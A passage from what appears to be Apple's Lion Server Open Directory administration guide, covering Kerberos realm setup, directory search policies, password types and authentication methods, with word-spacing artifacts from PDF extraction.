1. Make sure the server you want to join to the Kerberos realm is configured to access the s hared directory domain of the Kerberos server. To confirm, open Directory Utility (located under Account preferences) on the server you want to join to the Kerberos realm, or connect to the server us ing Directory Utility on another computer. Click Search Policy, then click Authentication and make sure the Kerberos s ervers directory domain is listed. If it is not listed, see Directory s erver connections for instructions on configuring access to the directory. 2. Open Server Admin and connect to the s erver you want to join to the Kerberos realm. 3. Click the triangle at the left of the server. The list of s ervices appears . 4. From the expanded Servers list, select Open Directory. 5. Click Settings, then click General. 6. Confirm that the role is connected to a directory server, then click Join Kerberos and enter the following information: For an Open Directory Kerberos realm or an Active Directory Kerberos realm, choos e the realm from the pop-up menu and enter the name and pas sword of a Kerberos administrator or a user with delegated Kerberos authority for the server. For an MIT-bas ed Kerberos realm, enter the name and password of a Kerberos administrator, the Kerberos realm name, and the DNS name of the Kerberos KDC server.
Start Kerberos after setting up an Open Directory master

If Kerberos doesnt start when you s et up an Open Directory master, you can us e Server Admin to start it manually, but first you must fix the problem that prevented Kerberos from starting. Usually the problem is that DNS is nt correctly configured or isnt running. Note: After you manually start Kerberos, users whose accounts have Open Directory pas swords and were created in the Open Directory masters LDAP directory while Kerberos was s topped might need to res et their pass words the next time they log in. A user account is therefore affected only if all recoverable authentication methods for Open Directory passwords were dis abled while Kerberos was stopped.
1. Open Server Admin and connect to the s erver. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Refresh (or choose View > Refresh) and verify the status of Kerberos as reported in the Overview pane. If Kerberos is running, theres nothing more to do. 5. Use Network Utility (in /Applications/Utilities/) to do a DNS lookup of the Open Directory masters DNS name and a reverse lookup of the IP address. If the servers DNS name or IP address doesnt res olve correctly: In the Network pane of System Preferences, look at the TCP/IP settings for the s ervers primary network interface (usually built-in Ethernet). Make sure the first DNS server lis ted is the one that res olves the Open Directory servers name. Check the configuration of DNS and make s ure its running. 6. In Server Admin, select Open Directory for the master s erver, click Settings, then click General. 7. Click Kerberize, then enter the following information: Administrator Name and Pas sword: You mus t authenticate as an administrator of the Open Directory masters LDAP directory. Realm Name: This field is set to be the servers DNS name converted to capital letters. This is the convention for naming a Kerberos realm. If necessary, enter a different name.
Disable Kerberos after setting up an Open Directory master

If your Open Directory server is in an existing directory environment that has a Kerberos realm running and you want to join it or avoid having a realm conflict, you can disable the Kerberos realm that is created when you s et up your Open Directory master. To disable a Kerberos realm on an Open Directory Mas ter Server:
1. Open Terminal. 2. Enter the following command: $ sudo sso_util remove -k -a username -p password -r NAME.OF.KERBEROSREALM Replace us ername, pass word, and NAME.OF.KERBEROSREALM with the user name and pass word of the Open Directory administrator and the name of the Kerberos realm that was created when you configured your Open Directory Master. The Open Directory Overview pane of Server Admin s hould s how the Kerberos s ervice status as stopped.
Delegate authority to join an Open Directory Kerberos realm

Using Server Admin, you can delegate the authority to join a s erver to an Open Directory mas ter server for s ingle s ign-on Kerberos authentication. You can delegate authority to user accounts. The accounts you delegate authority to mus t have a password type of Open Directory and mus t reside in the LDAP directory of the Open Directory master server. The dependent s erver you are delegating authority for must use Mac OS X Server v10.3 or later. Note: If an account with delegated Kerberos authority is deleted and recreated on the Open Directory master server, the new account does not have authority to join the dependent server to the Open Directory mas ters Kerberos realm. If you want the recreated account to have delegated Kerberos authority, you mus t add a new Kerberos record for the recreated account. A Kerberos adminis trator (that is , an Open Directory LDAP adminis trator) doesnt need delegated authority to join dependent servers to the Open Directory Kerberos realm. A Kerberos administrator has implicit authority to join any server to the Kerberos realm.
1. In Workgroup Manager, create a computer group in the LDAP directory domain of the Open Directory master server, or select an existing computer group in this directory: To s elect an exis ting computer group, click Accounts or choos e View > Accounts , click the Computer Group button (above the accounts list), and select the computer group to use. If the LDAP server doesnt have a computer group that you want to add the dependent server to, you can create one: a. Click Accounts, then click the Computers button (above the accounts list). b. Click the small globe icon above the list of accounts and use the pop-up menu to open the Open Directory masters LDAP directory. c. Click the lock and authenticate as an adminis trator of the LDAP directory. d. Click the Computers Group button (above the accounts list), then click New Computer Group or choose Server > New Computer Group. e. Enter a list name (for example, Kerberized Servers). 2. Click Members , then click the Add button (+) to open the computer drawer. 3. Drag computers and computer groups from the drawer to the members lis t. 4. Click Save to save changes to the computer group. 5. Click Preferences and make sure the computer group has no managed preference settings. If any item in the array of preference categories has a s mall arrow next to its icon, the item has managed preference settings. To remove managed preferences from an item, click the item, select Not Managed, and click Apply Now. If the item has multiple panes , select Not Managed in each pane, then click Apply Now.
6. To delegate Kerberos authority to user accounts, create the accounts : a. Make sure you are working in the LDAP directory of the Open Directory master server. If neces sary, click the small globe icon and use the pop-up menu to open this directory, then click the lock and authenticate as an adminis trator of this directory. b. Click the Users button (on the left), then click New User or choose Server > New Us er. c. Enter a name, short name, and password. d. Make sure User can acces s account or User may administer this s erver are not selected. You can change settings in other panes, but do not change the User Pas sword Type setting in the Advanced pane. A user with delegated Kerberos authority must have an Open Directory pass word. 7. Click Save to save the new user account. 8. Open Server Admin and connect to the Open Directory master server. 9. Click the triangle at the left of the server. The list of s ervices appears . 10. From the expanded Servers list, select Open Directory. 11. Click Settings, then click General 12. Confirm that the Role is Open Directory Mas ter, then click Add Kerberos Record and enter the following information: Administrator Name: Enter the name of an LDAP directory administrator on the Open Directory master s erver. Administrator Password: Enter the pass word of the adminis trator account you entered. Configuration Record Name: Enter the fully qualified DNS name. Delegated Administrators : Enter a short or long name for each us er account to which you want to delegate Kerberos authority for the specified server. 13. Click Add, then click Save to delegate Kerberos authority as specified. To delegate authority for more than one dependent server, repeat this procedure for each one.
Search policies
Open Directory search policies

Each Mac has a search policy, also commonly referred to as a search path, that s pecifies which directory domains Open Directory can access, such as the computers local directory domain and a particular shared directory. The s earch policy also specifies the order in which Open Directory access es directory domains. Open Directory searches each directory domain and stops s earching when it finds a match. For example, Open Directory stops s earching for a user record when it finds a record whose user name matches the name its looking for. Search policy levels A search policy can include only the local directory domain, the local directory domain and a shared directory, or the local directory domain and multiple shared directories . On a network with a shared directory, several computers generally access the s hared directory. This arrangement can be depicted as a tree-like s tructure with the s hared directory at the top and local directories at the bottom. Local directory domain search policy The s imples t search policy cons is ts only of a computers local directory domain. In this case, Open Directory looks for us er information and other administrative data only in the local directory domain of each computer. If a server on the network hosts a shared directory, Open Directory does not look there for us er information or adminis trative data becaus e the shared directory is not part of the computers s earch policy. The following illus tration shows two computers on a network that only search their own local directory domain for administrative data.
Two-level search policies If one s erver on the network hosts a shared directory, all computers on the network can include the shared directory in their search policies. In this case, Open Directory looks for us er information and other administrative data first in the local directory domain. If Open Directory doesnt find the information it needs in the local directory domain, it looks in the shared directory. The following illus tration shows two computers and a shared directory domain on a network. The computers are connected to the shared directory domain and have it in their s earch policy.
Heres a scenario in which a two-level s earch policy might be used:
Each class (English, math, s cience) has its own computer. The s tudents in each class are defined as users in the local domain of that classs computer. All three of thes e local domains have the s ame shared domain, in which all instructors are defined. Instructors, as members of the s hared domain, can log in to all class computers. The students in each local domain can log in to only the computer where their local account res ides. Local domains reside on their respective computers but a s hared domain res ides on a server accessible from the local domains computer. When an instructor logs in to any of the three class computers and cannot be found in the local domain, Open Directory searches the shared domain. In the following example, there is only one shared domain, but in more complex networks, there may be more shared domains.
Multilevel search policies If more than one s erver on the network hosts a shared directory, the computers on the network can include two or more s hared directories in their s earch policies. As with s impler search policies, Open Directory looks for us er information and other administrative data first in the local directory domain. If Open Directory does not find the information it needs in the local directory domain, it searches each s hared directory in the sequence specified by the search policy. Heres a scenario in which more than one shared directory might be used:
Each class (English, math, s cience) has a server that hos ts a s hared directory domain. Each clas sroom computers search policy specifies the computers local domain, the class s s hared domain, and the schools shared domain. The s tudents in each class are defined as us ers in the shared domain of that classs server, so each student can log in to any computer in the class . Because the instructors are defined in the shared domain of the s chool server, they can log in to any class room computer. You can affect an entire network or a group of computers by choosing the domain in which to define administrative data. The higher the administrative data resides in a search policy, the fewer places it must to be changed as users and s ystem resources change. Probably the most important aspect of directory s ervices for administrators is planning directory domains and search policies. These should reflect the resources to share, the users to share them among, and the way you want to manage your directory data. Automatic search policies Mac computers can be configured to s et search policies automatically. An automatic search policy consists of two parts , one of which is optional: Local directory domain Shared LDAP directory (optional)
A computers automatic s earch policy always begins with the computers local directory domain. If a Mac is not connected to a network, the computer searches its local directory domain for user accounts and other administrative data. The automatic search policy then determines whether the computer is configured to connect to a shared local directory domain. The computer can be connected to a shared local directory domain, which can in turn be connected to another s hared local directory domain, and s o on. A local directory domain connection, if any, constitutes the second part of the automatic s earch policy. For more information, see Inside a directory domain. An automatic s earch policy offers convenience and flexibility, es pecially for mobile computers. If a computer with an automatic search policy is disconnected from the network, connected to a different network, or moved to a different subnet, the automatic search policy can change. If the computer is disconnected from the network, it us es its local directory domain. If the computer is connected to a different network or subnet, it can change its local directory domain connection. With an automatic s earch policy, a computer doesnt need to be reconfigured to get directory and authentication services in its new location. Custom search policies For example, a custom search policy could specify that an Active Directory domain be s earched before an Open Directory servers shared directory domain. Users can configure their computer to log in using their user records from the Active Directory domain and have their preferences managed by group and computer records from the Open Directory domain. A cus tom s earch policy generally does not work in multiple network locations or while not connected to a network becaus e it relies on the availability of specific directory domains on the network. If a portable computer is disconnected from its usual network, it no longer has access to the s hared directory domains on its cus tom s earch policy. However, the disconnected computer s till has access to its local directory domain because it is the first directory domain on every s earch policy. The portable computer user can log in using a user record from the local directory domain, which can include mobile user accounts . These mirror user accounts from the s hared directory domain that the portable computer accesses when its connected to its usual network. Search policies for authentication and contacts A Mac computer has a search policy for finding authentication information and it has a separate search policy for finding contact information: Open Directory us es the authentication search policy to locate and retrieve user authentication information and other administrative data from directory domains. Open Directory us es the contacts search policy to locate and retrieve name, addres s, and other contact information from directory domains . Address Book uses this contact information, and other applications can be programmed to use it as well. Each search policy can be automatic, cus tom, or local directory domain only.
Authentication
About password types

Each user account has a pass word type that determines how the user account is authenticated. In a local directory domain, the standard pass word type is shadow pas sword. For user accounts in the LDAP directory of Lion Server, the standard pas sword type is Open Directory. Us er accounts in the LDAP directory can als o have a pas sword type of crypt password. Authentication and authorization Services such as the login window and Apple Filing Protocol (AFP) service request user authentication from Open Directory. Authentication is part of the proces s by which a s ervice determines whether it should grant a user access to a resource. Usually this proces s also requires authorization. Authentication proves a users identity, and authorization determines what the authenticated user is permitted to do. A user typically authenticates by providing a valid name and password. A service can then authorize the authenticated us er to acces s specific resources. For example, file service authorizes full access to folders and files that an authenticated user owns .
You experience authentication and authorization when you us e a credit card. The merchant authenticates you by comparing your signature on the s ales slip to the signature on your credit card. Then the merchant submits your authorized credit card account number to the bank, which authorizes payment based on your account balance and credit limit. Open Directory authenticates user accounts, and s ervice acces s control lists (SACLs ) authorize use of services. If Open Directory authenticates you, the SACL for login window determines whether you can log in, then the SACL for AFP service determines whether you can connect for file service, and so on. Some services also determine whether a user is authorized to access s pecific resources. This authorization can require retrieving other user account information from the directory domain. For example, AFP s ervice needs the user ID and group membership information to determine which folders and files the user is authorized to read from and write to. Open Directory passwords When a us ers account has a password type of Open Directory, the user can be authenticated by Kerberos or the Open Directory Pas sword Server. Kerberos is a network authentication system that us es credentials iss ued by a trusted s erver. Open Directory Pas sword Server supports the traditional pas sword authentication methods that some clients of network s ervices require. Kerberos and Open Directory Password Server do not store the password in the us ers account. Instead, they store pass words in secure databases apart from the directory domain, and pas swords can never be read. Pass words can only be set and verified. Malicious us ers might attempt to log in over the network hoping to gain access to Kerberos and Open Directory Pas sword Server. Open Directory logs can alert you to uns uccess ful login attempts. (See View Open Directory status and logs.) Open Directory passwords are required for domain login from a Windows workstation to a Mac server and can be used to authenticate for Windows file s ervice. This type of password can be validated using many authentication methods, including NTLMv2 and NTLMv1. Open Directory pas swords are stored in a secure database, not in user accounts. User accounts in the following directory domains can have Open Directory pass words: The LDAP directory of a Mac server The local directory domain of a Mac server Shadow passwords Shadow pas swords s upport similar authentication methods as Open Directory Pass word Server depending on the hash types that are enabled. A shadow password is stored as several has hes in the user account. The attribute which contains the pas sword is protected so it can only be read only by the root user account. Only us er accounts that are s tored in a computers local directory domain can have a s hadow pas sword. Crypt passwords A crypt pas sword is stored in a hash in the user account. This s trategy, his torically named bas ic authentication, is most compatible with s oftware that must access us er records directly. Crypt authentication s upports a maximum password length of eight bytes (eight ASCII characters). If a longer password is entered in a user account, only the first eight bytes are us ed for crypt pass word validation. Shadow pass words and Open Directory pas swords are not subject to this length limit. For secure trans miss ion of passwords over a network, crypt supports the DHX authentication method. Crypt pass words are not stored in clear text; they are concealed and made unreadable by encryption. A crypt pas sword is encrypted by supplying the clear text pass word with a random number to a mathematical function, known as a one-way hash function. A one-way has h function always generates the same encrypted value from particular input but cannot be used to recreate the original password from the encrypted output it generates. To validate a pass word using the encrypted value, Mac OS X Lion applies the function to the pas sword entered by the user and compares it with the value stored in the user account or shadow file. If the values match, the pass word is cons idered valid. Determine which authentication options to use To authenticate a user, Open Directory mus t determine which authentication option to us eKerberos, Open Directory Password Server, or shadow pass word. The users account contains information that specifies which authentication option to use. This information is named the authentication authority attribute. Open Directory us es the name provided by the user to locate the users account in the directory domain. Then Open Directory consults the authentication authority attribute in the users account and learns which authentication option to use. You can change a users authentication authority attribute by changing the pass word type in the Advanced pane of Workgroup
Manager, as shown in the following table. For more information, see Change the pas sword type to shadow password.
Passw ord type Open Directory Authentication authority Open Directory Password Server and Kerberos1 Attribute in user record Either or both: ;ApplePasswordServer; ;Kerberosv5; Shadow password Password file for each user, readable only by the root user account Either: ;ShadowHash; ShadowHash;HASHLIST :<list of hash types> Crypt password Encoded password in user record Either: ;basic; no attribute at all
You enable single s ign-on Kerberos authentication for a user account in an LDAP directory of Lion Server by setting the accounts pas sword type to Open Directory in the Advanced pane of Workgroup Manager. If the attribute in the user record is ;ShadowHash; without a list of enabled authentication methods, default authentication methods are enabled. The lis t of default authentication methods is different for Mac OS X Lion. The authentication authority attribute can specify multiple authentication options . For example, a user account with an Open Directory pass word type normally has an authentication authority attribute that s pecifies both Kerberos and Open Directory Pas sword Server. A user account doesnt need to include an authentication authority attribute. If a users account contains no authentication authority attribute, a Mac server assumes a crypt pas sword is stored in the us ers account. Offline attacks on passwords Because crypt pass words are stored in user accounts , they are potentially s ubject to attack. User accounts in a shared directory domain are acces sible on the network. Anyone on the network who has Workgroup Manager or knows how to use command-line tools can read the contents of user accounts , including crypt pas swords stored in them. Open Directory passwords and shadow passwords arent stored in us er accounts, s o these passwords cant be read from directory domains . A malicious attacker, or cracker, could use Workgroup Manager or UNIX commands to copy user records to a file. The cracker can then transport this file to a system and use various techniques to decode crypt passwords stored in user records. After decoding a crypt pas sword, the cracker can log in unnoticed with a legitimate user name and crypt pass word. This form of attack is known as an offline attack because it does not require succes sive login attempts to gain access to a system. An effective way to thwart pas sword cracking is to us e good pass words and avoid using crypt pas swords . A pas sword should contain letters, numbers, and symbols in combinations that cant be eas ily guess ed by unauthorized users. Good pass words should not cons is t of actual words . They can include digits and symbols (such as # or $), or they can consist of the first letter of all words in a phrase. Use both uppercase and lowercase letters. Shadow pas swords and Open Directory passwords are far less sus ceptible to offline attack because they are not stored in user records. Shadow pas swords are stored in separate files that can be read only by someone who knows the password of the root user account (also known as the system administrator). Open Directory passwords are s tored securely in the Kerberos KDC and in the Open Directory Password Server databas e. A users Open Directory password cant be read by other us ers, not even by a user with adminis trator rights for Open Directory authentication. (This adminis trator can change only Open Directory pass words and password policies.) Crypt pass words are not considered secure. They should be used only for user accounts that must be compatible with UNIX clients that require them. Being stored in user accounts, theyre too accessible and therefore subject to offline attack. Although stored in an encoded form, theyre relatively easy to decode.
Authentication
Single sign-on authentication

Lion Server us es Kerberos for single sign-on authentication, which relieves users from entering a name and password separately for every service. With single sign-on, a user always enters a name and pas sword in the login window. Thereafter, the us er does not need to enter a name and password for AFP service, mail s ervice, or other s ervices that use Kerberos authentication. To take advantage of single sign-on, users and s ervices mus t be Kerberizedconfigured for Kerberos authenticationand use the same Kerberos KDC server. User accounts that reside in an LDAP directory of a Mac server and have a pass word type of Open Directory us e the servers builtin KDC. These user accounts are configured for Kerberos and single sign-on. The servers Kerberized services use the servers built-in KDC and are configured for single s ign-on. This Mac s erver KDC can als o authenticate users for services provided by other s ervers. Having more servers with Lion Server use the Mac server KDC requires only minimal configuration. Kerberos authentication Kerberos was developed at MIT to provide secure authentication and communication over open networks like the Internet. Its named for the three-headed dog that guarded the entrance to the underworld of Greek mythology. Kerberos provides proof of identity for two parties . It enables you to prove who you are to network services you want to use. It also proves to your applications that network services are genuine, not spoofed. Like other authentication systems, Kerberos does not provide authorization. Each network service determines what you are permitted to do based on your proven identity. Kerberos permits a client and a server to identify each other much more securely than typical challenge-response pass word authentication methods . Kerberos als o provides a single sign-on environment where us ers authenticate only once a day, week, or other period of time, thereby easing authentication frequency. Lion Server offers integrated Kerberos s upport that virtually anyone can deploy. In fact, Kerberos deployment is s o automatic that users and administrators may not realize its deployed. Mac OS X v10.3 and later use Kerberos when s omeone logs in using an account set for Open Directory authentication. It is the default setting for user accounts in the Mac server LDAP directory. Other services provided by the LDAP directory server, s uch as AFP and mail service, als o use Kerberos automatically. If your network has other servers with Lion Server, joining them to the Kerberos server is eas y, and most of their services use Kerberos automatically. Alternatively, if your network has a Kerberos s ystem such as Microsoft Active Directory, you can s et up your Mac s erver and Macs to use it for authentication. Lion Server and Mac OS X v10.3 or later support Kerberos v5. Lion Server and Mac OS X v10.6 or later do not support Kerberos v4. The Internet is inherently insecure, yet few authentication protocols provide real security. Malicious hackers can us e readily available s oftware tools to intercept pas swords being sent over a network. Many applications s end passwords unencrypted, and these are ready to use as s oon as theyre intercepted. Even encrypted pas swords are not completely safe. Given enough time and computing power, encrypted passwords can be cracked. To isolate passwords on your private network you can use a firewall, but this does not solve all problems . For example, a firewall does not provide security agains t disgruntled or malicious insiders . Kerberos was designed to solve network security problems . It never transmits the us ers password across the network, nor does it save the pas sword in the users computer memory or on disk. Therefore, even if the Kerberos credentials are cracked or compromised, the attacker does not learn the original pas sword, s o he or she can potentially compromise only a small portion of the network. In addition to s uperior password management, Kerberos is als o mutually authenticated. The client authenticates to the s ervice, and the s ervice authenticates to the client. A man-in-the-middle or spoofing attack is imposs ible when you are using Kerberized services, and that means users can trust the services they are acces sing. Kerberos is available on every major platform, including Mac OS X Lion, Windows , Linux, and other UNIX variants. Moving beyond passwords Network authentication is difficult: to deploy a network authentication method, the client and server mus t agree on the authentication method. Although it is possible for client/server process es to agree on a custom authentication method, getting
pervasive adoption across a suite of network protocols, platforms , and clients is virtually impossible. For example, s uppose you want to deploy s mart cards as a network authentication method. Without Kerberos, you mus t change every client/s erver protocol to s upport the new method. The list of protocols includes SMTP, POP, IMAP, AFP, SMB, HTTP, FTP, IPP, SSH, QuickTime Streaming, DNS, LDAP, local directory domain, RPC, NFS, AFS, WebDAV, and LPR, and goes on and on. Cons idering all the software that does network authentication, deploying a new authentication method acros s the entire suite of network protocols would be a daunting task. Although this might be feas ible for software from one vendor, youd be unlikely to get all vendors to change their client s oftware to us e your new method. Further, youd probably als o want your authentication to work on multiple platforms (such as Mac OS X Lion, Windows, and UNIX). Due to the des ign of Kerberos, a client/server binary protocol that supports Kerberos doesnt even know how the user proves identity. Therefore you only need to change the Kerberos client and the Kerberos server to accept a new proof of identity s uch as a smart card. As a res ult, your entire Kerberos network has now adopted the new proof-of-identity method, without deploying new versions of client and server software. Kerberos provides a central authentication authority for the network. All Kerberos-enabled services and clients use this central authority. Administrators can centrally audit and control authentication policies and operations. Kerberos can authenticate users for the following services of a Mac server: Login window Mail service AFP file s ervice FTP file s ervice SMB file service (as a member of an Active Directory Kerberos realm) VPN service Apache web service LDAP directory s ervice iChat s ervice Print service NFS file service Xgrid service These services have been Kerberized whether they are running or not. Only services that are Kerberized can use Kerberos to authenticate a user. Lion Server includes command-line tools for Kerberizing other services that are compatible with MIT-based Kerberos . Breaking the barriers to Kerberos deployment Until recently Kerberos was a technology for universities and government sites. It wasnt more widely deployed because adoption barriers needed to be taken down. Mac OS X Lion and Mac OS X Server v10.3 or later eliminate the following historical barriers to adoption of Kerberos: An Administrator had to s et up a Kerberos KDC. This was difficult to deploy and administer. There was no standard integration with a directory sys tem. Kerberos only does authentication. It doesnt store user account data such as us er ID (UID), home folder location, or group members hip. The administrator had to determine how to integrate Kerberos with a directory sys tem. Servers had to be regis tered with the Kerberos KDC. This added an extra step to the server setup proces s. After setting up a Kerberos server, the administrator had to visit all client computers and configure each one to use Kerberos. This was time consuming and required editing configuration files and using command-line tools. You needed a suite of Kerberized applications (s erver and client software). Some of the basics were available but porting them and adapting them to work with your environment was difficult. Not all network protocols used for client-s erver authentication are Kerberos-enabled. Some network protocols still require traditional challenge-response authentication methods and there is no standard way to integrate Kerberos with these legacy network authentication methods.
Kerberos client supports failover s o if one KDC is offline it can us e a replica, but the administrator had to figure out how to set up a Kerberos replica. Administration tools were never integrated. Tools for creating and editing us er accounts in the directory domain didnt know anything about Kerberos, and the Kerberos tools knew nothing about us er accounts in directories . Setting up a us er record was a site-specific operation based on how the KDC was integrated with the directory system. Single sign-on experience Kerberos is a credential or ticket-based sys tem. The user logs in once to the Kerberos s ys tem and is iss ued a ticket with a life span. During the life s pan of this ticket the us er doesnt need to authenticate again to access a Kerberized service. The users Kerberized client software, s uch as the Mail application, pres ents a valid Kerberos ticket to authenticate the user for a Kerberized s ervice. This provides a single sign-on experience. A Kerberos ticket is like a press pas s to a jazz festival held at multiple nightclubs over a three-day weekend. You prove your identity once to get the pass. Until the pas s expires , you can s how it at any nightclub to get a ticket for a performance. All participating nightclubs accept your pass without seeing your proof of identity again.
Authentication
Configure services for Kerberos after upgrading

After upgrading to Lion Server, you may need to configure some s ervices to use s ingle sign-on Kerberos authentication. These services either werent configured to use Kerberos or werent included with the earlier vers ion of Mac OS X Server. If this condition exists, a mes sage about it appears when you connect to the s erver in Server Admin. The message appears in the Overview pane when you select the server (not a service) in the Servers lis t.
1. Open Server Admin and connect to the upgraded server. 2. Click the triangle at the left of the server. The list of s ervices appears . 3. From the expanded Servers list, select Open Directory. 4. Click Settings, then click General. 5. Click Kerberize Services , then enter the name and password of an LDAP directory administrator account. Services that were already configured to use Kerberos are not affected.
Authentication
Kerberos principal and realm

Kerberized s ervices are configured to authenticate principals who are known to a Kerberos realm. You can think of a realm as a Kerberos databas e or authentication domain that contains validation data for users , services, and s ometimes s ervers, which are all known as principals. For example, a realm contains principals s ecret keys, which are the result of a one-way function applied to passwords. Service principals are generally based on randomly generated secrets rather than passwords . Here are examples of realm and principal names. Realm names are capitalized by convention to distinguish them from DNS domain names: Realm: MYREALM.EXAMPLE.COM User principal: jsanchez@MYREALM.EXAMPLE.COM Service principal: afpserver/s omehost.example.com@MYREALM.EXAMPLE.COM There are several phases to Kerberos authentication. In the firs t phase, the client obtains credentials to be used to request access to Kerberized services. In the s econd phase, the client requests authentication for a specific service. In the final phase, the client presents those credentials to the service. The following illus tration summarizes these activities. The service and the client can be the same entity (such as the login window)
or two entities (s uch as a mail client and the mail server).
Kerberos authentication process 1. The client authenticates to a Kerberos KDC, which interacts with realms to access authentication data. This is the only s tep in which pas swords and associated password policy information are checked. 2. The KDC is sues a ticket-granting ticket to the client. The ticket is the credential needed when the client wants to us e Kerberized services and is good for a configurable period of time, but it can be revoked before expiration. It is cached on the client until it expires. 3. The client contacts the KDC with the ticket-granting ticket when it wants to us e a Kerberized s ervice. 4. The KDC is sues a ticket for that service. 5. The client pres ents the ticket to the s ervice. 6. The service authenticates the client by verifying that the ticket is valid. After authenticating the client, the s ervice determines if the client is authorized to use the service. Kerberos only authenticates clients; it does not authorize them to use services. For example, many services use Mac servers service access control lis ts (SACLs) to determine whether a client is authorized to us e the service. Kerberos never sends a password or pass word policy information to a s ervice. After a ticket-granting ticket is obtained, no pas sword information is provided. Time is very important with Kerberos. If the client and the KDC are out of sync by more than a few minutes, the client fails to achieve authentication with the KDC. The date, time, and time zone information must be correct on the KDC server and clients , and the server and clients should all use the s ame network time s ervice to keep their clocks in sync. For more information about Kerberos, go to the MIT Kerberos website at web.mit.edu/kerberos/www/index.html.
Authentication
About Open Directory password server and shadow password authentication methods
For compatibility with various s ervices , Lion Server can us e several authentication methods to validate Open Directory passwords and s hadow pass words. For Open Directory passwords , Lion Server uses the s tandard Simple Authentication and Security Layer (SASL) mechanism to negotiate an authentication method between a client and a service. For shadow pas swords , the use of SASL depends on the network protocol. The following authentication methods are s upported:
Method APOP CRAM-MD5 DHX Netw ork security Encrypted, with clear text fallback Encrypted, with clear text fallback Encrypted Storage security Clear text Encrypted Encrypted Uses POP mail service IMAP mail service, LDAP service AFP file service, Open Directory administration Digest-MD5 MS-CHAPv2 Encrypted Encrypted Encrypted Encrypted Login window, mail service VPN service
NTLMv1 and NTLMv2
Encrypted
Encrypted
SMB services (Windows NT/98 or later)
WebDAV-Digest
Encrypted
Clear text
WebDAV file service (iDisk)
Open Directory supports many authentication methods because each service that requires authentication us es some methods but not others. For example, AFP s ervice us es one set of authentication methods, web services use another set of methods, mail service uses another set, and so on. Some authentication methods are more secure than others . The more s ecure methods use s tronger algorithms to encode the information they trans mit between client and server. The more secure authentication methods als o store hashes, which cant eas ily be recovered from the server. Les s s ecure methods store a recoverable, clear-text password. Open Directory does not provide a mechanism for reading or retrieving a user's existing password, but an administrator can use Workgroup Manager to set a users pas sword. If you connect Mac OS X Server v10.4 or later to a directory domain of Mac OS X Server v10.3 or earlier, users defined in the older directory domain cannot be authenticated with the NTLMv2 method. This method may be required to securely authenticate some Windows users for the Windows s ervices of Mac OS X Server v10.4 or later. Open Directory Password Server in Mac OS X Server v10.4 or later supports NTLMv2 authentication, but Password Server in Mac OS X Server v10.3 or earlier does not support NTLMv2. If you connect Mac OS X Server v10.3 or later to a directory domain of Mac OS X Server v10.2 or earlier, users defined in the older directory domain cannot be authenticated with the MS-CHAPv2 method. This method may be required to securely authenticate users for the VPN service of Mac OS X Server v10.3 or later. Open Directory Password Server in Mac OS X Server v10.3 or later supports MS-CHAPv2 authentication, but Password Server in Mac OS X Server v10.2 does not support MS-CHAPv2. Disable Open Directory authentication methods To make Open Directory password storage on the server more secure, you can selectively disable authentication methods. For example, if no clients are going to use Windows services, you can disable the NTLMv1, NTLMv2, and LAN Manager authentication methods to prevent storing pass words on the server us ing these methods. Then s omeone who gains unauthorized access to the servers password databas e cant exploit weaknes ses in these authentication methods to crack pass words. Important: If you dis able an authentication method, its hash is removed from the pas sword database the next time the user authenticates. If you enable an authentication method that was disabled, every Open Directory pass word must be reset to add the newly enabled methods has h to the password databas e. Us ers can reset their own pas swords, or a directory adminis trator can do it. Disabling an authentication method makes the Open Directory Pass word Server database more secure if an unauthorized user gains phys ical access to an Open Directory s erver (mas ter or replica) or to media containing a backup of the Open Directory master. Someone who gains access to the password databas e can try to crack a us ers password by attacking the hash or recoverable text stored in the pass word database by any authentication method. Nothing is stored in the pas sword database by a disabled authentication method, leaving one less avenue of attack open to a cracker who has physical acces s to the Open Directory server or a backup of it. Some hashes stored in the password databas e are easier to crack than others . Recoverable authentication methods s tore clear (plainly readable) text. Disabling authentication methods that store clear text or weaker hashes increas es password database security more than disabling methods that store stronger has hes . If you believe your Open Directory mas ter, replicas, and backups are secure, select all authentication methods . If youre concerned about the phys ical s ecurity of any Open Directory server or its backup media, disable some methods. Note: Dis abling authentication methods does not increase the security of pas swords while they are transmitted over the network. Only password databas e s ecurity is affected. In fact, disabling some authentication methods might require clients to configure their software to send pass words over the network in clear text, thereby compromis ing pas sword security in a different way. Disable shadow password authentication methods You can selectively disable authentication methods to make passwords stored in s hadow pass word files more secure. For example, if a user does nt us e mail service or web s ervices, you can disable the WebDAV-Digest and APOP methods for the user. Then someone who gains access to the shadow password files on a server cant recover the users pas sword. Important: If you dis able a shadow password authentication method, its hash is removed from a users shadow password file the
next time the user authenticates. If you enable an authentication method that was disabled, the newly enabled methods hash is added to the users shadow pas sword file the next time the user authenticates for a service that can us e a clear-text password, such as a login window or AFP. Alternatively, you can reset the us ers password to add the newly enabled methods hash. The user can res et the pass word, or a directory administrator can do it. Disabling an authentication method makes the s hadow pass word more s ecure if a malicious user gains physical acces s to a servers shadow password files or to media containing a backup of the shadow password files. Someone who gains access to the pas sword files can try to crack a users pas sword by attacking the hash or recoverable text s tored by any authentication method. Nothing is stored by a dis abled authentication method, leaving one les s avenue of attack open to a cracker who has phys ical access to a servers s hadow pass word files or a backup of them. Hashes stored by some authentication methods are easier to crack than others . With recoverable authentication methods, original clear-text pass words can be reconstructed from what is stored in the file. Disabling the authentication methods that store recoverable or weaker hashes increases shadow pas sword file security more than dis abling methods that store stronger hashes. If you believe a s ervers shadow pas sword files and backups are s ecure, select all authentication methods. If youre concerned about the phys ical s ecurity of the s erver or its backup media, disable unus ed methods. Note: Dis abling authentication methods does not increase the security of pas swords while they are transmitted over the network. Only password storage security is affected. Dis abling some authentication methods might require clients to configure their software to s end passwords over the network in clear text, thereby compromising pass word security in a different way. Contents of the Open Directory password server database Open Directory Password Server maintains an authentication database separate from the directory domain. Open Directory tightly restricts acces s to the authentication database. Open Directory Password Server s tores the following information in its authentication databas e for each user account that has a pas sword type of Open Directory: The users pass word ID, a 128-bit value as signed when the password is created. It is also stored in the users record in the directory domain and is used as a key for finding a users record in the Open Directory Pass word Server database. The password, stored in recoverable (clear text) or hashed (encrypted) forms. The form depends on the authentication method. A recoverable pas sword is stored for the APOP and WebDAV authentication methods . For all other methods, the record stores a has hed (encrypted) pass word. If no authentication method requiring a clear-text password is enabled, the Open Directory authentication database stores only hashes of pass words. The users s hort name, for use in log mess ages viewable in Server Admin. Pass word policy data. Time stamps and other usage information, such as last login time, last failed validation time, count of failed validations, and replication information. LDAP bind authentication For user accounts that reside in an LDAP directory on a non-Apple server, Open 